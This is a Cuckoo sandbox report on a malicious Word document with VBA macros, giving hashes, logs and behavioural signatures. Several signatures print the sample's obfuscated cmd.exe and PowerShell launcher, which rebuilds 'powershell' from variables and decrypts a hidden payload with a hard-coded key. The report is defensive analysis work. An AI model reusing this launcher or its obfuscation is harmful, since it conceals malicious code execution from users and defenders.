File VirusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc

Size 187.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: NNNKdGvL, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Mar 14 19:02:00 2018, Last Saved Time/Date: Wed Mar 14 19:02:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5 fcc2686c5d100f2ae1bd6c8b6cfd50cc
SHA1 c73fcf3186aea563ba4ffeaa7617d70c9d4ed1a5
SHA256 6cc5ce59a494031e230cbec2cc4a774fcd52283ccb37a73dbea8e46e0bb94566
SHA512 bc348d55915da55c3d3cf062ec419072b13a2095c05e31f5fe3bfd22d0c51fb726ac7606f14a81aa13b7a6a7b4988072693e1db1a76c17ff6991a5dc92e2c65a
CRC32 649D9819
ssdeep None
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code

Score

This file is very suspicious, with a score of 10 out of 10!

Please note: the scoring system is still in development and should be considered an alpha feature.



Information on Execution

Analysis
Category: FILE
Started: Feb. 21, 2025, 2:50 a.m.
Completed: Feb. 21, 2025, 2:58 a.m.
Duration: 441 seconds
Routing: internet

Analyzer Log

2025-02-21 00:42:30,015 [analyzer] DEBUG: Starting analyzer from: C:\tmpt1gcja
2025-02-21 00:42:30,015 [analyzer] DEBUG: Pipe server name: \??\PIPE\qcEvHmATFxBnCnnvyAgIDAxCsW
2025-02-21 00:42:30,030 [analyzer] DEBUG: Log pipe server name: \??\PIPE\JnTMcrFqUEEPjbvKxSTcaUdLbA
2025-02-21 00:42:30,437 [analyzer] DEBUG: Started auxiliary module Curtain
2025-02-21 00:42:30,437 [analyzer] DEBUG: Started auxiliary module DbgView
2025-02-21 00:42:31,108 [analyzer] DEBUG: Started auxiliary module Disguise
2025-02-21 00:42:31,312 [analyzer] DEBUG: Loaded monitor into process with pid 508
2025-02-21 00:42:31,312 [analyzer] DEBUG: Started auxiliary module DumpTLSMasterSecrets
2025-02-21 00:42:31,312 [analyzer] DEBUG: Started auxiliary module Human
2025-02-21 00:42:31,312 [analyzer] DEBUG: Started auxiliary module InstallCertificate
2025-02-21 00:42:31,312 [analyzer] DEBUG: Started auxiliary module Reboot
2025-02-21 00:42:31,390 [analyzer] DEBUG: Started auxiliary module RecentFiles
2025-02-21 00:42:31,405 [analyzer] DEBUG: Started auxiliary module Screenshots
2025-02-21 00:42:31,405 [analyzer] DEBUG: Started auxiliary module Sysmon
2025-02-21 00:42:31,405 [analyzer] DEBUG: Started auxiliary module LoadZer0m0n
2025-02-21 00:42:31,530 [lib.api.process] INFO: Successfully executed process from path 'C:\\Program Files\\Microsoft Office\\Office14\\WINWORD.EXE' with arguments [u'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\VirusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc'] and pid 600
2025-02-21 00:42:31,671 [analyzer] DEBUG: Loaded monitor into process with pid 600
2025-02-21 00:42:35,671 [analyzer] INFO: Added new file to list with pid 600 and path C:\Users\Administrator\AppData\Roaming\Microsoft\Office\MSO1033.acl
2025-02-21 00:42:38,140 [analyzer] INFO: Added new file to list with pid 600 and path C:\Users\Administrator\AppData\Local\Temp\~$rusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc
2025-02-21 00:42:43,405 [analyzer] INFO: Injected into process with pid 1084 and name u'cmd.exe'
2025-02-21 00:42:43,546 [analyzer] INFO: Added new file to list with pid 600 and path C:\Users\Administrator\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\Built-In Building Blocks.dotx
2025-02-21 00:42:43,703 [analyzer] DEBUG: Loaded monitor into process with pid 1084
2025-02-21 00:42:43,905 [analyzer] INFO: Injected into process with pid 1824 and name u'powershell.exe'
2025-02-21 00:42:44,155 [analyzer] DEBUG: Loaded monitor into process with pid 1824
2025-02-21 01:55:04,835 [analyzer] INFO: Analysis timeout hit, terminating analysis.
2025-02-21 01:55:05,101 [lib.api.process] ERROR: Failed to dump memory of 64-bit process with pid 600.
2025-02-21 01:55:05,163 [lib.api.process] ERROR: Failed to dump memory of 64-bit process with pid 1084.
2025-02-21 01:55:05,210 [lib.api.process] ERROR: Failed to dump memory of 64-bit process with pid 1824.
2025-02-21 01:55:05,523 [analyzer] INFO: Terminating remaining processes before shutdown.
2025-02-21 01:55:05,523 [lib.api.process] INFO: Successfully terminated process with pid 600.
2025-02-21 01:55:05,523 [lib.api.process] INFO: Successfully terminated process with pid 1084.
2025-02-21 01:55:05,523 [lib.api.process] INFO: Successfully terminated process with pid 1824.
2025-02-21 01:55:05,631 [analyzer] INFO: Analysis completed.

Cuckoo Log

2025-02-21 02:50:46,973 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:48,201 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:49,228 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:50,263 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:51,295 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:52,319 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:53,348 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:54,369 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:55,398 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:56,444 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:57,471 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:58,508 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:50:59,760 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:00,807 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:01,980 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:03,003 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:04,028 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:05,060 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:06,119 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:07,257 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:08,402 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:10,471 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:11,494 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:12,522 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:13,550 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:14,576 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:15,612 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:16,668 [cuckoo.core.scheduler] DEBUG: Task #6009950: no machine available yet
2025-02-21 02:51:17,712 [cuckoo.core.scheduler] INFO: Task #6009950: acquired machine win7x642 (label=win7x642)
2025-02-21 02:51:17,716 [cuckoo.core.resultserver] DEBUG: Now tracking machine 192.168.168.202 for task #6009950
2025-02-21 02:51:18,188 [cuckoo.auxiliary.sniffer] INFO: Started sniffer with PID 3093839 (interface=vboxnet0, host=192.168.168.202)
2025-02-21 02:51:18,232 [cuckoo.machinery.virtualbox] DEBUG: Starting vm win7x642
2025-02-21 02:51:18,945 [cuckoo.machinery.virtualbox] DEBUG: Restoring virtual machine win7x642 to vmcloak
2025-02-21 02:54:26,255 [cuckoo.core.guest] INFO: Starting analysis #6009950 on guest (id=win7x642, ip=192.168.168.202)
2025-02-21 02:54:27,315 [cuckoo.core.guest] DEBUG: win7x642: not ready yet
2025-02-21 02:54:32,351 [cuckoo.core.guest] INFO: Guest is running Cuckoo Agent 0.10 (id=win7x642, ip=192.168.168.202)
2025-02-21 02:54:32,685 [cuckoo.core.guest] DEBUG: Uploading analyzer to guest (id=win7x642, ip=192.168.168.202, monitor=latest, size=6660546)
2025-02-21 02:54:34,222 [cuckoo.core.resultserver] DEBUG: Task #6009950: live log analysis.log initialized.
2025-02-21 02:54:35,510 [cuckoo.core.resultserver] DEBUG: Task #6009950 is sending a BSON stream
2025-02-21 02:54:36,128 [cuckoo.core.resultserver] DEBUG: Task #6009950 is sending a BSON stream
2025-02-21 02:54:36,878 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0001.jpg'
2025-02-21 02:54:37,073 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 133603
2025-02-21 02:54:39,192 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0002.jpg'
2025-02-21 02:54:39,208 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 121213
2025-02-21 02:54:40,334 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0003.jpg'
2025-02-21 02:54:40,356 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 123848
2025-02-21 02:54:41,470 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0004.jpg'
2025-02-21 02:54:41,486 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 123968
2025-02-21 02:54:42,591 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0005.jpg'
2025-02-21 02:54:42,607 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 124037
2025-02-21 02:54:43,721 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0006.jpg'
2025-02-21 02:54:43,741 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 123941
2025-02-21 02:54:44,835 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0007.jpg'
2025-02-21 02:54:44,858 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 124083
2025-02-21 02:54:46,110 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0008.jpg'
2025-02-21 02:54:46,167 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 124157
2025-02-21 02:54:47,786 [cuckoo.core.resultserver] DEBUG: Task #6009950 is sending a BSON stream
2025-02-21 02:54:48,287 [cuckoo.core.resultserver] DEBUG: Task #6009950 is sending a BSON stream
2025-02-21 02:54:48,288 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0009.jpg'
2025-02-21 02:54:48,305 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 124038
2025-02-21 02:54:49,198 [cuckoo.core.guest] DEBUG: win7x642: analysis #6009950 still processing
2025-02-21 02:54:49,397 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0010.jpg'
2025-02-21 02:54:49,403 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 56286
2025-02-21 02:54:52,611 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0011.jpg'
2025-02-21 02:54:52,647 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 67339
2025-02-21 02:54:59,898 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0012.jpg'
2025-02-21 02:54:59,908 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 66713
2025-02-21 02:55:04,332 [cuckoo.core.guest] DEBUG: win7x642: analysis #6009950 still processing
2025-02-21 02:55:05,337 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'curtain/1740099305.34.curtain.log'
2025-02-21 02:55:05,341 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 36
2025-02-21 02:55:05,511 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'sysmon/1740099305.51.sysmon.xml'
2025-02-21 02:55:05,528 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 1441798
2025-02-21 02:55:05,537 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'files/7aea3ff1bfd57255_~$russhare_fcc2686c5d100f2ae1bd6c8b6cfd50cc'
2025-02-21 02:55:05,540 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 162
2025-02-21 02:55:05,550 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'files/f76d3f5e949be2bf_mso1033.acl'
2025-02-21 02:55:05,553 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 37762
2025-02-21 02:55:05,596 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'files/5e9b4e081abe7439_built-in building blocks.dotx'
2025-02-21 02:55:05,626 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 4187307
2025-02-21 02:55:06,169 [cuckoo.core.resultserver] DEBUG: Task #6009950: File upload for 'shots/0013.jpg'
2025-02-21 02:55:06,185 [cuckoo.core.resultserver] DEBUG: Task #6009950 uploaded file length: 139348
2025-02-21 02:55:06,201 [cuckoo.core.resultserver] DEBUG: Task #6009950 had connection reset for <Context for LOG>
2025-02-21 02:55:07,355 [cuckoo.core.guest] INFO: win7x642: analysis completed successfully
2025-02-21 02:55:07,380 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Redsocks
2025-02-21 02:55:07,401 [cuckoo.core.plugins] DEBUG: Stopped auxiliary module: Sniffer
2025-02-21 02:55:08,518 [cuckoo.machinery.virtualbox] INFO: Successfully generated memory dump for virtual machine with label win7x642 to path /srv/cuckoo/cwd/storage/analyses/6009950/memory.dmp
2025-02-21 02:55:08,519 [cuckoo.machinery.virtualbox] DEBUG: Stopping vm win7x642
2025-02-21 02:58:07,808 [cuckoo.core.resultserver] DEBUG: Stopped tracking machine 192.168.168.202 for task #6009950
2025-02-21 02:58:08,221 [cuckoo.core.scheduler] DEBUG: Released database task #6009950
2025-02-21 02:58:08,254 [cuckoo.core.scheduler] INFO: Task #6009950: analysis procedure completed

Signatures

Yara rule detected for file (1 event)
description: Detect a MS Office document with embedded VBA macro code
rule: Contains_VBA_macro_code
Allocates read-write-execute memory (usually to unpack itself) (8 events)
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006f55000
process_handle: 0xffffffffffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006f55000
process_handle: 0xffffffffffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006f55000
process_handle: 0xffffffffffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000005d51000
process_handle: 0xffffffffffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006ff4000
process_handle: 0xffffffffffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000006ff3000
process_handle: 0xffffffffffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000070d1000
process_handle: 0xffffffffffffffff
status: 1, return: 0, repeated: 0

NtProtectVirtualMemory

process_identifier: 600
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000070d2000
process_handle: 0xffffffffffffffff
status: 1, return: 0, repeated: 0
Checks the amount of memory in the system; this can be used to detect virtual machines that have a low amount of memory available (1 event)
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

status: 1, return: 1, repeated: 0
One or more processes crashed (1 event)
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d NlsValidateLocale-0x13 kernelbase+0x9e5d @ 0x7fefd979e5d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefe9073c3
NdrClientCall2+0x6b3 NdrClearOutParameters-0xf3d rpcrt4+0xe1493 @ 0x7fefe9d1493
NdrClientCall2+0x1d NdrClearOutParameters-0x15d3 rpcrt4+0xe0dfd @ 0x7fefe9d0dfd
SLGetEncryptedPIDEx+0xac57 SLCallServer-0x63d osppc+0x1a0af @ 0x74eba0af
SLpVLActivateProduct+0xe9 SLpGetMSPidInformation-0xcb osppc+0xc7cd @ 0x74eac7cd
SLActivateProduct+0x3df SLGetServerStatus-0xca1 osppcext+0x3a48f @ 0x74a3a48f
??0OdfStgParams@@QEAA@XZ+0xe6804 mso+0x1013a38 @ 0x7feee123a38
MsoCompareStringA+0x145a5a MsoGetTextExtentExPointW-0x1ed15a mso+0x59c84e @ 0x7feed6ac84e
MsoFreeCvsList+0x18ee2 MsoFreeFlinfo-0x3fc8a mso+0x1d4e1e @ 0x7feed2e4e1e
MsoFreeCvsList+0x19202 MsoFreeFlinfo-0x3f96a mso+0x1d513e @ 0x7feed2e513e
MsoFreeCvsList+0x18d23 MsoFreeFlinfo-0x3fe49 mso+0x1d4c5f @ 0x7feed2e4c5f
MsoFreeCvsList+0x18c9c MsoFreeFlinfo-0x3fed0 mso+0x1d4bd8 @ 0x7feed2e4bd8
MsoFGetButtonSize+0x7e280 MsoPwlfFromFlinfo-0x10af0 mso+0x12511c @ 0x7feed23511c
MsoFGetButtonSize+0x7df94 MsoPwlfFromFlinfo-0x10ddc mso+0x124e30 @ 0x7feed234e30
MsoFGetButtonSize+0x7de30 MsoPwlfFromFlinfo-0x10f40 mso+0x124ccc @ 0x7feed234ccc
MsoFGetButtonSize+0x7d934 MsoPwlfFromFlinfo-0x1143c mso+0x1247d0 @ 0x7feed2347d0
MsoUninitOffice+0x99d MsoFHideTaiwan-0xf57 mso+0x21c11 @ 0x7feed131c11
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7765652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c541 @ 0x7788c541

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 90 90 90 90 90 90 90 90
exception.symbol: RaiseException+0x3d NlsValidateLocale-0x13 kernelbase+0x9e5d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 40541
exception.address: 0x7fefd979e5d
registers.r14: 0
registers.r15: 0
registers.rcx: 161147632
registers.rsi: 0
registers.r10: 148496688
registers.rbx: 0
registers.rsp: 161152848
registers.r11: 27
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 2114775703
registers.r13: 0
status: 1, return: 0, repeated: 0
An application raised an exception which may be indicative of an exploit crash (2 events)
Application Crash: Process WINWORD.EXE with pid 600 crashed
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d NlsValidateLocale-0x13 kernelbase+0x9e5d @ 0x7fefd979e5d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefe9073c3
NdrClientCall2+0x6b3 NdrClearOutParameters-0xf3d rpcrt4+0xe1493 @ 0x7fefe9d1493
NdrClientCall2+0x1d NdrClearOutParameters-0x15d3 rpcrt4+0xe0dfd @ 0x7fefe9d0dfd
SLGetEncryptedPIDEx+0xac57 SLCallServer-0x63d osppc+0x1a0af @ 0x74eba0af
SLpVLActivateProduct+0xe9 SLpGetMSPidInformation-0xcb osppc+0xc7cd @ 0x74eac7cd
SLActivateProduct+0x3df SLGetServerStatus-0xca1 osppcext+0x3a48f @ 0x74a3a48f
??0OdfStgParams@@QEAA@XZ+0xe6804 mso+0x1013a38 @ 0x7feee123a38
MsoCompareStringA+0x145a5a MsoGetTextExtentExPointW-0x1ed15a mso+0x59c84e @ 0x7feed6ac84e
MsoFreeCvsList+0x18ee2 MsoFreeFlinfo-0x3fc8a mso+0x1d4e1e @ 0x7feed2e4e1e
MsoFreeCvsList+0x19202 MsoFreeFlinfo-0x3f96a mso+0x1d513e @ 0x7feed2e513e
MsoFreeCvsList+0x18d23 MsoFreeFlinfo-0x3fe49 mso+0x1d4c5f @ 0x7feed2e4c5f
MsoFreeCvsList+0x18c9c MsoFreeFlinfo-0x3fed0 mso+0x1d4bd8 @ 0x7feed2e4bd8
MsoFGetButtonSize+0x7e280 MsoPwlfFromFlinfo-0x10af0 mso+0x12511c @ 0x7feed23511c
MsoFGetButtonSize+0x7df94 MsoPwlfFromFlinfo-0x10ddc mso+0x124e30 @ 0x7feed234e30
MsoFGetButtonSize+0x7de30 MsoPwlfFromFlinfo-0x10f40 mso+0x124ccc @ 0x7feed234ccc
MsoFGetButtonSize+0x7d934 MsoPwlfFromFlinfo-0x1143c mso+0x1247d0 @ 0x7feed2347d0
MsoUninitOffice+0x99d MsoFHideTaiwan-0xf57 mso+0x21c11 @ 0x7feed131c11
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7765652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c541 @ 0x7788c541

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 90 90 90 90 90 90 90 90
exception.symbol: RaiseException+0x3d NlsValidateLocale-0x13 kernelbase+0x9e5d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x8007007b
exception.offset: 40541
exception.address: 0x7fefd979e5d
registers.r14: 0
registers.r15: 0
registers.rcx: 161147632
registers.rsi: 0
registers.r10: 148496688
registers.rbx: 0
registers.rsp: 161152848
registers.r11: 27
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 2114775703
registers.r13: 0
status: 1, return: 0, repeated: 0
Creates hidden or system file (1 event)
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 5 (FILE_OVERWRITE_IF)
file_handle: 0x00000000000003cc
filepath: C:\Users\Administrator\AppData\Local\Temp\~$rusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\ADMINI~1\AppData\Local\Temp\~$rusShare_fcc2686c5d100f2ae1bd6c8b6cfd50cc
create_options: 4194400 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
status: 1, return: 0, repeated: 0
Creates a suspicious process (2 events)
cmdline "C:\Windows\System32\cmd.exe" apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('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' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
cmdline powershell "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('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' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
A process created a hidden window (1 event)
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('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' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
filepath: cmd
status: 1, return: 1, repeated: 0
A command shell or script process was created by an unexpected parent process (1 event)
parent_process winword.exe martian_process cmd apRbHrO EDHKZhizWwzfbiXhDYoTSzLT IIqwNqsjaWqf & %C^om^S^pEc% %C^om^S^pEc% /V /c set %qSKqZwGasVPLAjE%=mYSBOWwfLFAOv&&set %ZFJjsqCNFzjUTZ%=p&&set %CQFswJPFuKz%=ow&&set %mNsVdcoFqUDskdE%=VSvEcjcq&&set %iZIRGWMKmMNiTh%=!%ZFJjsqCNFzjUTZ%!&&set %vETUfiTwsfFHWqW%=PmvDOId&&set %wUuTGGAzLdENi%=er&&set %IMHbLklGnQWW%=!%CQFswJPFuKz%!&&set %BYmEZDNYMcNku%=s&&set %stXpmEJSClCZYIU%=LAFAFYwkfwr&&set %KzPWuzEtLfcOS%=he&&set %RYMrNHHqSqk%=ll&&!%iZIRGWMKmMNiTh%!!%IMHbLklGnQWW%!!%wUuTGGAzLdENi%!!%BYmEZDNYMcNku%!!%KzPWuzEtLfcOS%!!%RYMrNHHqSqk%! "& ((GET-vaRIable '*MDR*').NaME[3,11,2]-joIn'') ( ( [rUNTimE.iNtEROPSeRVIcES.mARshal]::PTrTosTrINgUni([RunTIMe.INTeRopservIces.MarshAL]::SecUrEsTRIngtogLobaLaLlocUNiCoDe($('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' | ConvERtTO-seCUresTRInG -kEy 235,141,10,115,253,223,40,208,200,207,56,80,97,178,217,1,219,168,233,93,195,61,84,222,48,18,135,157,195,85,87,106) ))))
One or more non-safelisted processes were created (2 events)
